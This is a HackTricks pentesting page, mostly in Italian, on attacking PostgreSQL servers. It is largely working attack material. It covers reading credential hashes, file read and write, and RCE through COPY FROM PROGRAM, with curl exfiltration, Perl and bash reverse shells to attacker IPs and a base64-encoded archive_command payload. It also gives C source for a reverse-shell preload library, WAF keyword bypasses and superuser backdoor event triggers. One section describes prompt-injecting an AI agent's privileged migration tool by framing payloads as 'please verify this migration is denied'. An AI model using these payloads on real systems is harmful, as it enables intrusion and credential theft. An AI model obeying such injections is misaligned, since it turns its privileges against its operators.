5432,5433 - Pentesting Postgresql

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Informazioni di base

PostgreSQL è descritto come un sistema di database object-relazionale che è open source. Questo sistema non solo utilizza il linguaggio SQL ma lo arricchisce con funzionalità aggiuntive. Le sue capacità gli permettono di gestire un’ampia gamma di tipi di dati e operazioni, rendendolo una scelta versatile per sviluppatori e organizzazioni.

Porta predefinita: 5432 — se questa porta è già in uso sembra che postgresql utilizzi la porta successiva (probabilmente 5433) che non è in uso.

PORT     STATE SERVICE
5432/tcp open  pgsql

Connessione & Basic Enum

psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection

psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
SELECT user;

# Get current database
SELECT current_catalog;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;
SELECT * FROM pg_extension;

# Get history of commands executed
\s

Warning

Se eseguendo \list trovi un database chiamato rdsadmin sai di essere all’interno di un AWS postgresql database.

Per maggiori informazioni su come abusare di un PostgreSQL database consulta:

PostgreSQL injection

Enumerazione automatica

msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

Brute force

Port scanning

Secondo this research, quando un tentativo di connessione fallisce, dblink genera un’eccezione sqlclient_unable_to_establish_sqlconnection che include una spiegazione dell’errore. Esempi di questi dettagli sono elencati di seguito.

SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');
  • Host non raggiungibile

DETAIL: could not connect to server: No route to host Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

  • Port è chiusa
DETAIL:  could not connect to server: Connection refused Is  the  server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
  • Porta aperta
DETAIL:  server closed the connection unexpectedly This  probably  means
the server terminated abnormally before or while processing the request

o

DETAIL:  FATAL:  password authentication failed for user "name"
  • Porta aperta o filtrata
DETAIL:  could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

In PL/pgSQL functions, attualmente non è possibile ottenere i dettagli delle eccezioni. Tuttavia, se hai accesso diretto al server PostgreSQL, puoi recuperare le informazioni necessarie. Se estrarre nomi utente e password dalle tabelle di sistema non è fattibile, puoi considerare di utilizzare il wordlist attack method discusso nella sezione precedente, poiché potrebbe dare risultati positivi.

Enumerazione dei privilegi

Ruoli

Role Types
rolsuperIl ruolo ha privilegi di superuser
rolinheritIl ruolo eredita automaticamente i privilegi dei ruoli di cui è membro
rolcreateroleIl ruolo può creare altri ruoli
rolcreatedbIl ruolo può creare database
rolcanloginIl ruolo può effettuare il login. Cioè, questo ruolo può essere utilizzato come identificatore di autorizzazione iniziale della sessione
rolreplicationIl ruolo è un ruolo di replica. Un ruolo di replica può iniziare connessioni di replica e creare o eliminare slot di replica.
rolconnlimitPer i ruoli che possono effettuare il login, questo imposta il numero massimo di connessioni concorrenti che questo ruolo può aprire. -1 significa nessun limite.
rolpasswordNon è la password (viene sempre mostrato come ********)
rolvaliduntilData di scadenza della password (usata solo per l’autenticazione via password); null se non scade
rolbypassrlsIl ruolo ignora tutte le policy di row-level security, vedere Section 5.8 per ulteriori informazioni.
rolconfigValori di default specifici del ruolo per le variabili di configurazione a run-time
oidID del ruolo

Gruppi interessanti

  • If you are a member of pg_execute_server_program you can eseguire programmi
  • If you are a member of pg_read_server_files you can leggere file
  • If you are a member of pg_write_server_files you can scrivere file

Tip

Nota che in Postgres un utente, un gruppo e un ruolo sono la stessa cosa. Dipende solo da come lo usi e se gli permetti di effettuare il login.

# Get users roles
\du

#Get users roles & groups
# r.rolpassword
# r.rolconfig,
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');

# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
## You will probably get this error:
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.

# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.

Tabelle

# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';

# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;

#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';

Funzioni

# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
\df+ pg_read_binary_file #Check who has access

# Get all functions of a schema
\df pg_catalog.*

# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;

# Another aparent option
SELECT * FROM pg_proc;

Azioni sul file-system

Leggere directory e file

Da questo commit i membri del gruppo definito DEFAULT_ROLE_READ_SERVER_FILES (chiamato pg_read_server_files) e super users possono usare il metodo COPY su qualsiasi percorso (consulta convert_and_check_filename in genfile.c):

# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;

Warning

Ricorda che se non sei superuser ma hai il permesso CREATEROLE puoi renderti membro di quel gruppo:

GRANT pg_read_server_files TO username;

More info.

Ci sono altre postgres functions che possono essere usate per leggere un file o elencare una directory. Solo superusers e utenti con permessi espliciti possono usarle:

# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission

select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');

# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file

# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation

Puoi trovare altre funzioni in https://www.postgresql.org/docs/current/functions-admin.html

Scrittura semplice di file

Solo super users e i membri di pg_write_server_files possono usare copy per scrivere file.

copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';

Warning

Ricorda che se non sei super user ma hai il permesso CREATEROLE puoi aggiungerti come membro di quel gruppo:

GRANT pg_write_server_files TO username;

More info.

Ricorda che COPY non può gestire i caratteri di nuova riga, quindi anche se stai usando un payload base64 devi inviare tutto in una sola riga.
Una limitazione molto importante di questa tecnica è che copy cannot be used to write binary files as it modify some binary values.

Binary files upload

However, there are other techniques to upload big binary files:

Big Binary Files Upload (PostgreSQL)

Updating PostgreSQL table data via local file write

Se hai le autorizzazioni necessarie per leggere e scrivere i file del server PostgreSQL, puoi aggiornare qualsiasi tabella sul server sovrascrivendo il file node associato nella PostgreSQL data directory. More on this technique here.

Passaggi richiesti:

  1. Recuperare la directory dei dati di PostgreSQL
SELECT setting FROM pg_settings WHERE name = 'data_directory';

Nota: Se non riesci a recuperare il percorso corrente della data directory dalle impostazioni, puoi interrogare la versione major di PostgreSQL tramite la query SELECT version() e provare a forzare il percorso. I percorsi comuni della data directory nelle installazioni Unix di PostgreSQL sono /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/. Un nome di cluster comune è main.

  1. Ottenere un percorso relativo al filenode associato alla tabella target
SELECT pg_relation_filepath('{TABLE_NAME}')

Questa query dovrebbe restituire qualcosa come base/3/1337. Il percorso completo su disco sarà $DATA_DIRECTORY/base/3/1337, cioè /var/lib/postgresql/13/main/base/3/1337.

  1. Scaricare il filenode tramite le funzioni lo_*
SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
  1. Ottenere il datatype associato alla tabella target
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
  1. Usa il PostgreSQL Filenode Editor per modificare il filenode; imposta tutti i flag booleani rol* a 1 per permessi completi.
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}

Demo PostgreSQL Filenode Editor

  1. Ricaricare il filenode modificato tramite le funzioni lo_* e sovrascrivere il file originale sul disco
SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
  1. (Opzionalmente) Svuota la cache della tabella in memoria eseguendo una query SQL onerosa
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
  1. Ora dovresti vedere i valori della tabella aggiornati in PostgreSQL.

Puoi anche diventare superadmin modificando la tabella pg_authid. Vedi la sezione seguente.

RCE

RCE to program

Dal version 9.3, only super users and member of the group pg_execute_server_program can use copy for RCE (example with exfiltration:

'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -

Esempio per exec:

#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

Warning

Ricorda che se non sei superutente ma hai i permessi CREATEROLE puoi renderti membro di quel gruppo:

GRANT pg_execute_server_program TO username;

More info.

Or use the multi/postgres/postgres_copy_from_program_cmd_exec module from metasploit.
Ulteriori informazioni su questa vulnerabilità here. While reported as CVE-2019-9193, Postges declared this was a feature and will not be fixed.

Bypass dei filtri keyword/WAF per raggiungere COPY PROGRAM

Nei contesti SQLi con query impilate, un WAF può rimuovere o bloccare la keyword letterale COPY. Puoi costruire la statement dinamicamente ed eseguirla all’interno di un blocco PL/pgSQL DO. Ad esempio, costruisci la C iniziale con CHR(67) per aggirare filtri ingenui ed esegui il comando assemblato con EXECUTE:

DO $$
DECLARE cmd text;
BEGIN
cmd := CHR(67) || 'OPY (SELECT '''') TO PROGRAM ''bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"''';
EXECUTE cmd;
END $$;

Questo pattern evita il filtraggio statico per keyword e ottiene comunque l’esecuzione di comandi OS tramite COPY ... PROGRAM. È particolarmente utile quando l’applicazione restituisce errori SQL e permette query impilate.

RCE with PostgreSQL Languages

RCE with PostgreSQL Languages

RCE with PostgreSQL extensions

Once you have learned from the previous post how to upload binary files you could try obtain RCE uploading a postgresql extension and loading it.

RCE with PostgreSQL Extensions

PostgreSQL configuration file RCE

Tip

The following RCE vectors are especially useful in constrained SQLi contexts, as all steps can be performed through nested SELECT statements

Il file di configurazione di PostgreSQL è scrivibile dall’utente postgres, che è quello che esegue il database, quindi come superuser puoi scrivere file nel filesystem e, di conseguenza, sovrascrivere questo file.

RCE with ssl_passphrase_command

More information about this technique here.

Il file di configurazione ha alcuni attributi interessanti che possono portare a RCE:

  • ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key' Percorso alla chiave privata del database
  • ssl_passphrase_command = '' Se il file privato è protetto da password (cifrato) postgresql eseguirà il comando indicato in questo attributo.
  • ssl_passphrase_command_supports_reload = off Se questo attributo è on il comando eseguito se la chiave è protetta da password verrà eseguito quando pg_reload_conf() è eseguita.

Quindi, un attaccante dovrà:

  1. Dump private key dal server
  2. Encrypt la private key scaricata:
    1. rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
  3. Overwrite
  4. Dump la corrente postgresql configuration
  5. Overwrite la configuration con la configurazione che imposta gli attributi citati:
    1. ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
    2. ssl_passphrase_command_supports_reload = on
  6. Eseguire pg_reload_conf()

Durante i test ho notato che questo funziona solo se il file della chiave privata ha permessi 640, è di proprietà di root e del gruppo ssl-cert or postgres (quindi l’utente postgres può leggerlo), e si trova in /var/lib/postgresql/12/main.

RCE with archive_command

More information about this config and about WAL here.

Un altro attributo nel file di configurazione sfruttabile è archive_command.

Perché questo funzioni, il setting archive_mode deve essere 'on' o 'always'. Se è vero, allora possiamo sovrascrivere il comando in archive_command e forzarlo ad eseguirsi tramite le operazioni WAL (write-ahead logging).

I passaggi generali sono:

  1. Verificare se archive mode è abilitato: SELECT current_setting('archive_mode')
  2. Sovrascrivere archive_command con il payload. Per esempio, una reverse shell: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
  3. Ricaricare la config: SELECT pg_reload_conf()
  4. Forzare l’operazione WAL per far eseguire l’archive command: SELECT pg_switch_wal() oppure SELECT pg_switch_xlog() per alcune versioni di Postgres
Editing postgresql.conf via Large Objects (SQLi-friendly)

Quando sono necessarie scritture multi-linea (es., per impostare più GUCs), usare i PostgreSQL Large Objects per leggere e sovrascrivere la config interamente tramite SQL. Questo approccio è ideale in contesti SQLi dove COPY non può gestire newlines o scritture binary-safe.

Example (adjust the major version and path if needed, e.g. version 15 on Debian):

-- 1) Import the current configuration and note the returned OID (example OID: 114575)
SELECT lo_import('/etc/postgresql/15/main/postgresql.conf');

-- 2) Read it back as text to verify
SELECT encode(lo_get(114575), 'escape');

-- 3) Prepare a minimal config snippet locally that forces execution via WAL
--    and base64-encode its contents, for example:
--    archive_mode = 'always'\n
--    archive_command = 'bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"'\n
--    archive_timeout = 1\n
--    Then write the new contents into a new Large Object and export it over the original file
SELECT lo_from_bytea(223, decode('<BASE64_POSTGRESQL_CONF>', 'base64'));
SELECT lo_export(223, '/etc/postgresql/15/main/postgresql.conf');

-- 4) Reload the configuration and optionally trigger a WAL switch
SELECT pg_reload_conf();
-- Optional explicit trigger if needed
SELECT pg_switch_wal();  -- or pg_switch_xlog() on older versions

Questo permette l’esecuzione affidabile di comandi OS tramite archive_command come utente postgres, a condizione che archive_mode sia abilitato. In pratica, impostare un basso archive_timeout può provocare invocazioni rapide senza richiedere un esplicito switch del WAL.

RCE with preload libraries

More information about this technique here.

Questo vettore di attacco sfrutta le seguenti variabili di configurazione:

  • session_preload_libraries – librerie che verranno caricate dal server PostgreSQL alla connessione del client.
  • dynamic_library_path – elenco di directory in cui il server PostgreSQL cercherà le librerie.

Possiamo impostare il valore di dynamic_library_path su una directory scrivibile dall’utente postgres che esegue il database, ad es. la directory /tmp/, e caricare lì un oggetto .so malevolo. Successivamente forzeremo il server PostgreSQL a caricare la libreria appena caricata includendola nella variabile session_preload_libraries.

I passaggi dell’attacco sono:

  1. Scaricare il file originale postgresql.conf
  2. Includere la directory /tmp/ nel valore di dynamic_library_path, p.es. dynamic_library_path = '/tmp:$libdir'
  3. Includere il nome della libreria malevola nel valore di session_preload_libraries, p.es. session_preload_libraries = 'payload.so'
  4. Verificare la major version di PostgreSQL tramite la query SELECT version()
  5. Compilare il codice della libreria malevola con il corretto PostgreSQL dev package. Esempio di codice:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

void _init() {
/*
code taken from https://www.revshells.com/
*/

int port = REVSHELL_PORT;
struct sockaddr_in revsockaddr;

int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP");

connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);

char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}

Compilazione del codice:

gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
  1. Caricare il postgresql.conf malevolo creato nei passaggi 2-3 e sovrascrivere quello originale
  2. Caricare il payload.so del passaggio 5 nella directory /tmp
  3. Ricaricare la configurazione del server riavviando il server o invocando la query SELECT pg_reload_conf()
  4. Alla prossima connessione al DB riceverai la reverse shell.

Postgres Privesc

CREATEROLE Privesc

Grant

According to the docs: I ruoli che possiedono il privilegio CREATEROLE possono concedere o revocare l’appartenenza a qualsiasi ruolo che non è un superuser.

Quindi, se possiedi il permesso CREATEROLE, potresti concederti l’accesso ad altri ruoli (che non sono superuser) che possono permetterti di leggere e scrivere file ed eseguire comandi:

# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;

Modifica Password

Gli utenti con questo ruolo possono anche cambiare le passwords di altri non-superusers:

#Change password
ALTER USER user_name WITH PASSWORD 'new_password';

Privesc to SUPERUSER

È abbastanza comune trovare che gli utenti locali possono accedere a PostgreSQL senza fornire alcuna password. Pertanto, una volta ottenute le autorizzazioni per eseguire codice, puoi abusare di queste autorizzazioni per concederti il ruolo di SUPERUSER:

COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';

Tip

Questo è solitamente possibile a causa delle seguenti righe nel file pg_hba.conf:

# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

ALTER TABLE privesc

In this writeup è spiegato come sia stato possibile eseguire un privesc in Postgres GCP abusando del privilegio ALTER TABLE che era stato concesso all’utente.

Quando provi a rendere un altro utente proprietario di una tabella dovresti ricevere un errore che lo impedisce, ma apparentemente GCP ha dato quell’opzione all’utente postgres non-superuser in GCP:

Unendo questa idea al fatto che quando i comandi INSERT/UPDATE/ANALYZE vengono eseguiti su una tabella con una funzione di indice, la funzione è chiamata come parte del comando con i permessi del proprietario della tabella. È possibile creare un indice con una funzione e assegnare i permessi di owner a un super user su quella tabella, e poi eseguire ANALYZE sulla tabella con la funzione dannosa che sarà in grado di eseguire comandi perché usa i privilegi del proprietario.

GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);

Exploitation

  1. Inizia creando una nuova tabella.
  2. Inserisci del contenuto irrilevante nella tabella per fornire dati alla funzione di indice.
  3. Sviluppa una funzione di indice malevola che contiene un payload per l’esecuzione di codice, permettendo l’esecuzione di comandi non autorizzati.
  4. Esegui ALTER sull’owner della tabella impostandolo su “cloudsqladmin”, che è il ruolo superuser di GCP usato esclusivamente da Cloud SQL per gestire e mantenere il database.
  5. Esegui un’operazione ANALYZE sulla tabella. Questa azione costringe il motore PostgreSQL a cambiare al contesto utente dell’owner della tabella, “cloudsqladmin”. Di conseguenza, la funzione di indice malevola viene chiamata con i permessi di “cloudsqladmin”, permettendo così l’esecuzione del comando shell precedentemente non autorizzato.

In PostgreSQL, questo flusso appare più o meno così:

CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);

INSERT INTO temp_table VALUES ('dummy content');

/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';

CREATE INDEX index_malicious ON public.temp_table (suid_function(data));

ALTER TABLE temp_table OWNER TO cloudsqladmin;

/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';

ANALYZE public.temp_table;

Quindi, la tabella shell_commands_results conterrà l’output del codice eseguito:

uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)

Local Login

Alcune istanze di postgresql mal configurate potrebbero consentire il login di qualsiasi utente locale; è possibile effettuare il login da 127.0.0.1 usando la funzione dblink:

\du * # Get Users
\l    # Get databases
SELECT * FROM dblink('host=127.0.0.1
port=5432
user=someuser
password=supersecret
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);

Warning

Nota che per far funzionare la query precedente la funzione dblink deve esistere. Se non esiste, puoi provare a crearla con

CREATE EXTENSION dblink;

Se hai la password di un utente con più privilegi, ma l’utente non è autorizzato a effettuare il login da un IP esterno, puoi usare la seguente funzione per eseguire query come quell’utente:

SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);

È possibile verificare se questa funzione esiste con:

SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;

Funzione definita personalizzata con SECURITY DEFINER

In this writeup, pentesters were able to privesc inside a postgres instance provided by IBM, because they found this function with the SECURITY DEFINER flag:

CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
    VOLATILE SECURITY DEFINER
    PARALLEL UNSAFE
COST 100

AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
…

As explained in the docs a function with SECURITY DEFINER is executed with the privileges of the user that owns it. Therefore, if the function is vulnerable to SQL Injection or is doing some privileged actions with params controlled by the attacker, it could be abused to escalate privileges inside postgres.

In the line 4 of the previous code you can see that the function has the SECURITY DEFINER flag.

CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);

E poi esegui comandi:

Pass Burteforce con PL/pgSQL

PL/pgSQL è un linguaggio di programmazione completo che offre un maggior controllo procedurale rispetto a SQL. Permette l’uso di loops e di altre control structures per arricchire la logica del programma. Inoltre, SQL statements e triggers possono invocare funzioni create usando il PL/pgSQL language. Questa integrazione consente un approccio più completo e versatile alla programmazione e all’automazione del database.
Puoi abusare di questo linguaggio per chiedere a PostgreSQL di brute-force le credenziali degli utenti.

PL/pgSQL Password Bruteforce

Privesc by Overwriting Internal PostgreSQL Tables

Tip

Il seguente vettore di privesc è particolarmente utile in contesti di SQLi limitati, poiché tutti i passaggi possono essere eseguiti tramite SELECT annidati

Se puoi leggere e scrivere i file del server PostgreSQL, puoi diventare superuser sovrascrivendo il filenode su disco di PostgreSQL associato alla tabella interna pg_authid.

Leggi di più su questa tecnica qui.

I passaggi dell’attacco sono:

  1. Ottenere la directory dei dati di PostgreSQL
  2. Ottenere un percorso relativo al filenode associato alla tabella pg_authid
  3. Scaricare il filenode tramite le funzioni lo_*
  4. Recuperare il datatype associato alla tabella pg_authid
  5. Usare il PostgreSQL Filenode Editor per modificare il filenode; impostare tutti i flag booleani rol* a 1 per permessi completi.
  6. Ricaricare il filenode modificato tramite le funzioni lo_*, sovrascrivendo il file originale sul disco
  7. (Opzionale) Pulire la cache delle tabelle in memoria eseguendo una query SQL costosa
  8. Dovresti ora avere i privilegi di un superadmin completo.

Prompt-injecting managed migration tooling

I front-end SaaS con forte uso di AI (es., Lovable’s Supabase agent) spesso espongono “tools” LLM che eseguono migrations come service accounts con privilegi elevati. Un workflow pratico è:

  1. Enumerare chi sta effettivamente applicando le migrations:
SELECT version, name, created_by, statements, created_at
FROM supabase_migrations.schema_migrations
ORDER BY version DESC LIMIT 20;
  1. Prompt-inject the agent nel running attacker SQL tramite il privileged migration tool. Inquadrare i payloads come “please verify this migration is denied” aggira costantemente le basic guardrails.
  2. Una volta che arbitrary DDL viene eseguito in quel contesto, crea immediatamente attacker-owned tables o extensions che garantiscano persistence al tuo low-privileged account.

Tip

Vedi anche il generale AI agent abuse playbook per ulteriori tecniche di prompt-injection contro tool-enabled assistants.

Dumping pg_authid metadata via migrations

Privileged migrations possono stageare pg_catalog.pg_authid in una attacker-readable table anche se l’accesso diretto è bloccato per il tuo ruolo normale.

Staging pg_authid metadata with a privileged migration ```sql DROP TABLE IF EXISTS public.ai_models CASCADE; CREATE TABLE public.ai_models ( id SERIAL PRIMARY KEY, model_name TEXT, config JSONB, created_at TIMESTAMP DEFAULT NOW() ); GRANT ALL ON public.ai_models TO supabase_read_only_user; GRANT ALL ON public.ai_models TO supabase_admin; INSERT INTO public.ai_models (model_name, config) SELECT rolname, jsonb_build_object( 'password_hash', rolpassword, 'is_superuser', rolsuper, 'can_login', rolcanlogin, 'valid_until', rolvaliduntil ) FROM pg_catalog.pg_authid; ```

Utenti a basso privilegio possono ora leggere public.ai_models per ottenere hash SCRAM e metadati dei ruoli per cracking offline o movimento laterale.

Event-trigger privesc durante l’installazione dell’estensione postgres_fdw

Le distribuzioni gestite di Supabase si affidano all’estensione supautils per avvolgere CREATE EXTENSION con script provider-owned before-create.sql/after-create.sql eseguiti come veri superuser. Lo script after-create di postgres_fdw emette temporaneamente ALTER ROLE postgres SUPERUSER, esegue ALTER FOREIGN DATA WRAPPER postgres_fdw OWNER TO postgres, quindi riporta postgres a NOSUPERUSER. Poiché ALTER FOREIGN DATA WRAPPER attiva i trigger di evento ddl_command_start/ddl_command_end mentre current_user è superuser, i trigger creati dal tenant possono eseguire SQL dell’attaccante in quella finestra.

Flusso dell’exploit:

  1. Crea una funzione trigger di evento PL/pgSQL che verifica SELECT usesuper FROM pg_user WHERE usename = current_user e, quando è true, provvede a un ruolo backdoor (es., CREATE ROLE priv_esc WITH SUPERUSER LOGIN PASSWORD 'temp123').
  2. Registra la funzione sia su ddl_command_start che su ddl_command_end.
  3. DROP EXTENSION IF EXISTS postgres_fdw CASCADE; seguito da CREATE EXTENSION postgres_fdw; per rieseguire l’after-create hook di Supabase.
  4. Quando l’hook eleva postgres, il trigger si esegue, crea il ruolo SUPERUSER persistente e lo concede nuovamente a postgres per un facile accesso con SET ROLE.
Event trigger PoC per la finestra after-create di postgres_fdw ```sql CREATE OR REPLACE FUNCTION escalate_priv() RETURNS event_trigger AS $$ DECLARE is_super BOOLEAN; BEGIN SELECT usesuper INTO is_super FROM pg_user WHERE usename = current_user; IF is_super THEN BEGIN EXECUTE 'CREATE ROLE priv_esc WITH SUPERUSER LOGIN PASSWORD ''temp123'''; EXCEPTION WHEN duplicate_object THEN NULL; END; BEGIN EXECUTE 'GRANT priv_esc TO postgres'; EXCEPTION WHEN OTHERS THEN NULL; END; END IF; END; $$ LANGUAGE plpgsql;

DROP EVENT TRIGGER IF EXISTS log_start CASCADE; DROP EVENT TRIGGER IF EXISTS log_end CASCADE; CREATE EVENT TRIGGER log_start ON ddl_command_start EXECUTE FUNCTION escalate_priv(); CREATE EVENT TRIGGER log_end ON ddl_command_end EXECUTE FUNCTION escalate_priv();

DROP EXTENSION IF EXISTS postgres_fdw CASCADE; CREATE EXTENSION postgres_fdw;

</details>

